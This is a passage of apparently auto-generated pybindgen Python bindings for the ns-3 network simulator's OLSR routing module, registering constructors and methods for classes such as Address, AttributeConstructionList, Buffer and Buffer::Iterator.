register_Ns3EventId_methods(root_module, root_module['ns3::EventId']) register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher']) register_Ns3Inet6SocketAddress_methods(root_module, root_module['ns3::Inet6SocketAddress']) register_Ns3InetSocketAddress_methods(root_module, root_module['ns3::InetSocketAddress']) register_Ns3IntToType__0_methods(root_module, root_module['ns3::IntToType< 0 >']) register_Ns3IntToType__1_methods(root_module, root_module['ns3::IntToType< 1 >']) register_Ns3IntToType__2_methods(root_module, root_module['ns3::IntToType< 2 >']) register_Ns3IntToType__3_methods(root_module, root_module['ns3::IntToType< 3 >']) register_Ns3IntToType__4_methods(root_module, root_module['ns3::IntToType< 4 >']) register_Ns3IntToType__5_methods(root_module, root_module['ns3::IntToType< 5 >']) register_Ns3IntToType__6_methods(root_module, root_module['ns3::IntToType< 6 >']) register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address']) register_Ns3Ipv4InterfaceAddress_methods(root_module, root_module['ns3::Ipv4InterfaceAddress']) register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask']) register_Ns3Ipv4RoutingHelper_methods(root_module, root_module['ns3::Ipv4RoutingHelper']) register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address']) register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix']) register_Ns3Mac48Address_methods(root_module, root_module['ns3::Mac48Address']) register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer']) register_Ns3NonCopyable_methods(root_module, root_module['ns3::NonCopyable']) register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase']) register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter']) register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory']) register_Ns3OlsrHelper_methods(root_module, root_module['ns3::OlsrHelper']) register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata']) register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item']) register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator']) register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator']) register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item']) register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList']) register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData']) register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >']) register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator']) register_Ns3SystemWallClockMs_methods(root_module, root_module['ns3::SystemWallClockMs']) register_Ns3Tag_methods(root_module, root_module['ns3::Tag']) register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer']) register_Ns3TimeWithUnit_methods(root_module, root_module['ns3::TimeWithUnit']) register_Ns3Timer_methods(root_module, root_module['ns3::Timer']) register_Ns3TimerImpl_methods(root_module, root_module['ns3::TimerImpl']) register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId']) register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation']) register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation']) register_Ns3Empty_methods(root_module, root_module['ns3::empty']) register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t']) register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk']) register_Ns3Header_methods(root_module, root_module['ns3::Header']) register_Ns3Ipv4Header_methods(root_module, root_module['ns3::Ipv4Header']) register_Ns3Object_methods(root_module, root_module['ns3::Object']) register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator']) register_Ns3RandomVariableStream_methods(root_module, root_module['ns3::RandomVariableStream']) register_Ns3SequentialRandomVariable_methods(root_module, root_module['ns3::SequentialRandomVariable']) register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >']) register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >']) register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >']) register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >']) register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >']) register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >']) register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >']) register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >']) register_Ns3SimpleRefCount__Ns3NetDeviceQueue_Ns3Empty_Ns3DefaultDeleter__lt__ns3NetDeviceQueue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >']) register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >']) register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >']) register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >']) register_Ns3SimpleRefCount__Ns3QueueItem_Ns3Empty_Ns3DefaultDeleter__lt__ns3QueueItem__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >']) register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >']) register_Ns3Socket_methods(root_module, root_module['ns3::Socket']) register_Ns3SocketIpTosTag_methods(root_module, root_module['ns3::SocketIpTosTag']) register_Ns3SocketIpTtlTag_methods(root_module, root_module['ns3::SocketIpTtlTag']) register_Ns3SocketIpv6HopLimitTag_methods(root_module, root_module['ns3::SocketIpv6HopLimitTag']) register_Ns3SocketIpv6TclassTag_methods(root_module, root_module['ns3::SocketIpv6TclassTag']) register_Ns3SocketPriorityTag_methods(root_module, root_module['ns3::SocketPriorityTag']) register_Ns3SocketSetDontFragmentTag_methods(root_module, root_module['ns3::SocketSetDontFragmentTag']) register_Ns3Time_methods(root_module, root_module['ns3::Time']) register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor']) register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer']) register_Ns3TriangularRandomVariable_methods(root_module, root_module['ns3::TriangularRandomVariable']) register_Ns3UniformRandomVariable_methods(root_module, root_module['ns3::UniformRandomVariable']) register_Ns3WeibullRandomVariable_methods(root_module, root_module['ns3::WeibullRandomVariable']) register_Ns3ZetaRandomVariable_methods(root_module, root_module['ns3::ZetaRandomVariable']) register_Ns3ZipfRandomVariable_methods(root_module, root_module['ns3::ZipfRandomVariable']) register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor']) register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker']) register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue']) register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker']) register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase']) register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue']) register_Ns3ConstantRandomVariable_methods(root_module, root_module['ns3::ConstantRandomVariable']) register_Ns3DeterministicRandomVariable_methods(root_module, root_module['ns3::DeterministicRandomVariable']) register_Ns3EmpiricalRandomVariable_methods(root_module, root_module['ns3::EmpiricalRandomVariable']) register_Ns3EmptyAttributeAccessor_methods(root_module, root_module['ns3::EmptyAttributeAccessor']) register_Ns3EmptyAttributeChecker_methods(root_module, root_module['ns3::EmptyAttributeChecker']) register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue']) register_Ns3ErlangRandomVariable_methods(root_module, root_module['ns3::ErlangRandomVariable']) register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl']) register_Ns3ExponentialRandomVariable_methods(root_module, root_module['ns3::ExponentialRandomVariable']) register_Ns3GammaRandomVariable_methods(root_module, root_module['ns3::GammaRandomVariable']) register_Ns3Ipv4_methods(root_module, root_module['ns3::Ipv4']) register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker']) register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue']) register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker']) register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue']) register_Ns3Ipv4MulticastRoute_methods(root_module, root_module['ns3::Ipv4MulticastRoute']) register_Ns3Ipv4Route_methods(root_module, root_module['ns3::Ipv4Route']) register_Ns3Ipv4RoutingProtocol_methods(root_module, root_module['ns3::Ipv4RoutingProtocol']) register_Ns3Ipv4StaticRouting_methods(root_module, root_module['ns3::Ipv4StaticRouting']) register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker']) register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue']) register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker']) register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue']) register_Ns3LogNormalRandomVariable_methods(root_module, root_module['ns3::LogNormalRandomVariable']) register_Ns3Mac48AddressChecker_methods(root_module, root_module['ns3::Mac48AddressChecker']) register_Ns3Mac48AddressValue_methods(root_module, root_module['ns3::Mac48AddressValue']) register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice']) register_Ns3NetDeviceQueue_methods(root_module, root_module['ns3::NetDeviceQueue']) register_Ns3NetDeviceQueueInterface_methods(root_module, root_module['ns3::NetDeviceQueueInterface']) register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector']) register_Ns3Node_methods(root_module, root_module['ns3::Node']) register_Ns3NormalRandomVariable_methods(root_module, root_module['ns3::NormalRandomVariable']) register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker']) register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue']) register_Ns3OutputStreamWrapper_methods(root_module, root_module['ns3::OutputStreamWrapper']) register_Ns3Packet_methods(root_module, root_module['ns3::Packet']) register_Ns3ParetoRandomVariable_methods(root_module, root_module['ns3::ParetoRandomVariable']) register_Ns3QueueItem_methods(root_module, root_module['ns3::QueueItem']) register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue']) register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker']) register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue']) register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker']) register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue']) register_Ns3Ipv4ListRouting_methods(root_module, root_module['ns3::Ipv4ListRouting']) register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation']) register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a']) register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32']) register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64']) register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3']) register_Ns3OlsrAssociation_methods(root_module, root_module['ns3::olsr::Association']) register_Ns3OlsrAssociationTuple_methods(root_module, root_module['ns3::olsr::AssociationTuple']) register_Ns3OlsrDuplicateTuple_methods(root_module, root_module['ns3::olsr::DuplicateTuple']) register_Ns3OlsrIfaceAssocTuple_methods(root_module, root_module['ns3::olsr::IfaceAssocTuple']) register_Ns3OlsrLinkTuple_methods(root_module, root_module['ns3::olsr::LinkTuple']) register_Ns3OlsrMessageHeader_methods(root_module, root_module['ns3::olsr::MessageHeader']) register_Ns3OlsrMessageHeaderHello_methods(root_module, root_module['ns3::olsr::MessageHeader::Hello']) register_Ns3OlsrMessageHeaderHelloLinkMessage_methods(root_module, root_module['ns3::olsr::MessageHeader::Hello::LinkMessage']) register_Ns3OlsrMessageHeaderHna_methods(root_module, root_module['ns3::olsr::MessageHeader::Hna']) register_Ns3OlsrMessageHeaderHnaAssociation_methods(root_module, root_module['ns3::olsr::MessageHeader::Hna::Association']) register_Ns3OlsrMessageHeaderMid_methods(root_module, root_module['ns3::olsr::MessageHeader::Mid']) register_Ns3OlsrMessageHeaderTc_methods(root_module, root_module['ns3::olsr::MessageHeader::Tc']) register_Ns3OlsrMprSelectorTuple_methods(root_module, root_module['ns3::olsr::MprSelectorTuple']) register_Ns3OlsrNeighborTuple_methods(root_module, root_module['ns3::olsr::NeighborTuple']) register_Ns3OlsrOlsrState_methods(root_module, root_module['ns3::olsr::OlsrState']) register_Ns3OlsrPacketHeader_methods(root_module, root_module['ns3::olsr::PacketHeader']) register_Ns3OlsrRoutingProtocol_methods(root_module, root_module['ns3::olsr::RoutingProtocol']) register_Ns3OlsrRoutingTableEntry_methods(root_module, root_module['ns3::olsr::RoutingTableEntry']) register_Ns3OlsrTopologyTuple_methods(root_module, root_module['ns3::olsr::TopologyTuple']) register_Ns3OlsrTwoHopNeighborTuple_methods(root_module, root_module['ns3::olsr::TwoHopNeighborTuple']) return def register_Ns3Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## address.h (module 'network'): ns3::Address::Address() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor] cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor] cls.add_constructor([param('ns3::Address const &', 'address')]) ## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function] cls.add_method('CheckCompatible', 'bool', [param('uint8_t', 'type'), param('uint8_t', 'len')], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function] cls.add_method('CopyAllFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function] cls.add_method('CopyAllTo', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint8_t', 'len')], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function] cls.add_method('CopyFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function] cls.add_method('CopyTo', 'uint32_t', [param('uint8_t *', 'buffer')], is_const=True) ## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'buffer')]) ## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function] cls.add_method('GetLength', 'uint8_t', [], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function] cls.add_method('IsInvalid', 'bool', [], is_const=True) ## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function] cls.add_method('IsMatchingType', 'bool', [param('uint8_t', 'type')], is_const=True) ## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function] cls.add_method('Register', 'uint8_t', [], is_static=True) ## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'buffer')], is_const=True) return def register_Ns3AttributeConstructionList_methods(root_module, cls): ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor] cls.add_constructor([]) ## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function] cls.add_method('Add', 'void', [param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')]) ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function] cls.add_method('Begin', 'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', [], is_const=True) ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function] cls.add_method('End', 'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', [], is_const=True) ## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('Find', 'ns3::Ptr< ns3::AttributeValue >', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True) return def register_Ns3AttributeConstructionListItem_methods(root_module, cls): ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor] cls.add_constructor([]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable] cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable] cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False) return def register_Ns3Buffer_methods(root_module, cls): ## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor] cls.add_constructor([]) ## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor] cls.add_constructor([param('uint32_t', 'dataSize')]) ## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor] cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')]) ## buffer.h (module 'network'): ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor] cls.add_constructor([param('ns3::Buffer const &', 'o')]) ## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(uint32_t end) [member function] cls.add_method('AddAtEnd', 'void', [param('uint32_t', 'end')]) ## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function] cls.add_method('AddAtEnd', 'void', [param('ns3::Buffer const &', 'o')]) ## buffer.h (module 'network'): void ns3::Buffer::AddAtStart(uint32_t start) [member function] cls.add_method('AddAtStart', 'void', [param('uint32_t', 'start')]) ## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function] cls.add_method('Begin', 'ns3::Buffer::Iterator', [], is_const=True) ## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function] cls.add_method('CopyData', 'void', [param('std::ostream *', 'os'), param('uint32_t', 'size')], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function] cls.add_method('CopyData', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')], is_const=True) ## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function] cls.add_method('CreateFragment', 'ns3::Buffer', [param('uint32_t', 'start'), param('uint32_t', 'length')], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Deserialize', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function] cls.add_method('End', 'ns3::Buffer::Iterator', [], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function] cls.add_method('GetSize', 'uint32_t', [], is_const=True) ## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function] cls.add_method('PeekData', 'uint8_t const *', [], is_const=True) ## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function] cls.add_method('RemoveAtEnd', 'void', [param('uint32_t', 'end')]) ## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function] cls.add_method('RemoveAtStart', 'void', [param('uint32_t', 'start')]) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function] cls.add_method('Serialize', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True) return def register_Ns3BufferIterator_methods(root_module, cls): ## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')]) ## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor] cls.add_constructor([]) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function] cls.add_method('CalculateIpChecksum', 'uint16_t', [param('uint16_t', 'size')]) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function] cls.add_method('CalculateIpChecksum', 'uint16_t', [param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')]) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function] cls.add_method('GetDistanceFrom', 'uint32_t', [param('ns3::Buffer::Iterator const &', 'o')], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetRemainingSize() const [member function] cls.add_method('GetRemainingSize', 'uint32_t', [], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function] cls.add_method('GetSize', 'uint32_t', [], is_const=True) ## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function] cls.add_method('IsEnd', 'bool', [], is_const=True) ## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function] cls.add_method('IsStart', 'bool', [], is_const=True) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function] cls.add_method('Next', 'void', []) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function] cls.add_method('Next', 'void', [param('uint32_t', 'delta')]) ## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::PeekU8() [member function] cls.add_method('PeekU8', 'uint8_t', []) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function] cls.add_method('Prev', 'void', []) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function] cls.add_method('Prev', 'void', [param('uint32_t', 'delta')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function] cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(ns3::Buffer::Iterator start, uint32_t size) [member function] cls.add_method('Read', 'void', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'size')]) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function] cls.add_method('ReadLsbtohU16', 'uint16_t', []) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member function] cls.add_method('ReadLsbtohU32', 'uint32_t', []) ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function] cls.add_method('ReadLsbtohU64', 'uint64_t', []) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function] cls.add_method('ReadNtohU16', 'uint16_t', []) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function] cls.add_method('ReadNtohU32', 'uint32_t', []) ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function] cls.add_method('ReadNtohU64', 'uint64_t', []) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function] cls.add_method('ReadU16', 'uint16_t', []) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function] cls.add_method('ReadU32', 'uint32_t', []) ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function] cls.add_method('ReadU64', 'uint64_t', []) ## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function] cls.add_method('ReadU8', 'uint8_t', []) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function] cls.add_method('Write', 'void', [param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function] cls.add_method('WriteHtolsbU16', 'void', [param('uint16_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function] cls.add_method('WriteHtolsbU32', 'void', [param('uint32_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function] cls.add_method('WriteHtolsbU64', 'void', [param('uint64_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function] cls.add_method('WriteHtonU16', 'void', [param('uint16_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function] cls.add_method('WriteHtonU32', 'void', [param('uint32_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function] cls.add_method('WriteHtonU64', 'void', [param('uint64_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function] cls.add_method('WriteU16', 'void', [param('uint16_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function] cls.add_method('WriteU32', 'void', [param('uint32_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function] cls.add_method('WriteU64', 'void', [param('uint64_t', 'data')]) ## buffer.h (module 'network'): void 